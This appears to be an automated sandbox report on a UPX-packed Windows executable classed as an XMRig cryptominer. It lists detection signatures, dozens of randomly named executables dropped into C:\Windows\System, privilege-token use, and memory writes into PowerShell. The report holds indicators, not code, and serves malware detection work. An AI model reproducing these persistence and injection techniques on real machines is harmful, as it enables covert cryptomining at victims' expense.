Malware Analysis Report

2024-12-07 08:36

Sample ID 241113-ldxqjayhnf
Target 358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe
SHA256 358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8

Threat Level: Known bad

The file 358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 09:25

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 09:25

Reported

2024-11-13 09:27

Platform

win7-20240903-en

Max time kernel

120s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe"

Signatures

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\zLGcPWb.exe N/A
N/A N/A C:\Windows\System\Cklaxgu.exe N/A
N/A N/A C:\Windows\System\mQFsvBO.exe N/A
N/A N/A C:\Windows\System\fbeAOgx.exe N/A
N/A N/A C:\Windows\System\sLKnBhc.exe N/A
N/A N/A C:\Windows\System\sftvZTT.exe N/A
N/A N/A C:\Windows\System\gqbhrYH.exe N/A
N/A N/A C:\Windows\System\OmLirDO.exe N/A
N/A N/A C:\Windows\System\MhVjhhz.exe N/A
N/A N/A C:\Windows\System\mHtnkLe.exe N/A
N/A N/A C:\Windows\System\SIRraOO.exe N/A
N/A N/A C:\Windows\System\Msthvdb.exe N/A
N/A N/A C:\Windows\System\dPhRdxK.exe N/A
N/A N/A C:\Windows\System\OdTTrXW.exe N/A
N/A N/A C:\Windows\System\GSnpsQD.exe N/A
N/A N/A C:\Windows\System\DBalsZL.exe N/A
N/A N/A C:\Windows\System\Bbdyuxd.exe N/A
N/A N/A C:\Windows\System\vglspTn.exe N/A
N/A N/A C:\Windows\System\wKGUGVB.exe N/A
N/A N/A C:\Windows\System\hRkqUkH.exe N/A
N/A N/A C:\Windows\System\TQqamMI.exe N/A
N/A N/A C:\Windows\System\wNZMGiu.exe N/A
N/A N/A C:\Windows\System\rUaGoxM.exe N/A
N/A N/A C:\Windows\System\UaSPdxs.exe N/A
N/A N/A C:\Windows\System\YKZfSTm.exe N/A
N/A N/A C:\Windows\System\DYRIhfB.exe N/A
N/A N/A C:\Windows\System\cOrITQH.exe N/A
N/A N/A C:\Windows\System\fJprSFw.exe N/A
N/A N/A C:\Windows\System\QieheqP.exe N/A
N/A N/A C:\Windows\System\hyTSDbk.exe N/A
N/A N/A C:\Windows\System\qkBFAQU.exe N/A
N/A N/A C:\Windows\System\QGGqJKa.exe N/A
N/A N/A C:\Windows\System\EVWKxVh.exe N/A
N/A N/A C:\Windows\System\UOZEPpS.exe N/A
N/A N/A C:\Windows\System\qChdeXc.exe N/A
N/A N/A C:\Windows\System\sHLCJEP.exe N/A
N/A N/A C:\Windows\System\PTDltoy.exe N/A
N/A N/A C:\Windows\System\OMLMVxQ.exe N/A
N/A N/A C:\Windows\System\whZqEbZ.exe N/A
N/A N/A C:\Windows\System\aHKIWtK.exe N/A
N/A N/A C:\Windows\System\Wruzkcw.exe N/A
N/A N/A C:\Windows\System\kRrBBbD.exe N/A
N/A N/A C:\Windows\System\LkSrxnd.exe N/A
N/A N/A C:\Windows\System\yhblSEe.exe N/A
N/A N/A C:\Windows\System\LSCjWCS.exe N/A
N/A N/A C:\Windows\System\omzNmfB.exe N/A
N/A N/A C:\Windows\System\ESdzCqy.exe N/A
N/A N/A C:\Windows\System\JLzXxeN.exe N/A
N/A N/A C:\Windows\System\dtQKzUx.exe N/A
N/A N/A C:\Windows\System\DCLCiHY.exe N/A
N/A N/A C:\Windows\System\CmZJrAM.exe N/A
N/A N/A C:\Windows\System\CfqPGyp.exe N/A
N/A N/A C:\Windows\System\mOsacio.exe N/A
N/A N/A C:\Windows\System\nEZVesq.exe N/A
N/A N/A C:\Windows\System\FMDAFra.exe N/A
N/A N/A C:\Windows\System\IvTLFja.exe N/A
N/A N/A C:\Windows\System\xCYvitD.exe N/A
N/A N/A C:\Windows\System\DnkxgtF.exe N/A
N/A N/A C:\Windows\System\LHdTzsw.exe N/A
N/A N/A C:\Windows\System\VErGPwE.exe N/A
N/A N/A C:\Windows\System\KJyfaBf.exe N/A
N/A N/A C:\Windows\System\YAFRjSj.exe N/A
N/A N/A C:\Windows\System\irdJWee.exe N/A
N/A N/A C:\Windows\System\NkaZDDP.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\urapfgO.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\KQIERre.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\dTWWbxx.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\IYCnMuT.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\AuNQmuh.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ufdQLFh.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\DukAMtj.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\gPJdroy.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\JLzXxeN.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\sPNaYxr.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\TOZIWqQ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\gddCdan.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\nlNOSfM.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\uqQzGAv.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\OPxTphW.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\jTQGSLo.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\SWBDLrA.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\lyMyZsZ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\PmMKAgZ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ttyaUFs.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\bTNtjyv.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\YRRISXX.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\SbkRslP.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\byYRJqY.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\SXUPqHH.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\mqNWeTm.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\KcSRdsY.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\LmCCVPb.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\eqpidQn.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\lPunPWR.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\tGROcNq.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\EJoVwLa.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\LsrCExC.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ciBKurE.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\MLDlKRQ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\vgXrltV.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\zoByCQV.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\mzwTRRO.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\LBsFycS.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\CAnfPsJ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\GHabbzm.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\kCtJAtI.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\TmEVRdN.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\lVvuAIo.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\qNYUexo.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\vssEWsk.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ljgjzZS.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\TprxREB.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\GTLgdJR.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\QQmANrN.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\XQbXNDo.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\VRIUrCe.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\MvuCrNS.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\ItyMuHb.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\syvuEsT.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\POcIyzC.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\smIAMed.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\RuQJhjT.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\LEAIFZu.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\EdcVAfl.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\NwukcLd.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\GRONXWJ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\AozaKRC.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\bbpOFEy.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2936 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
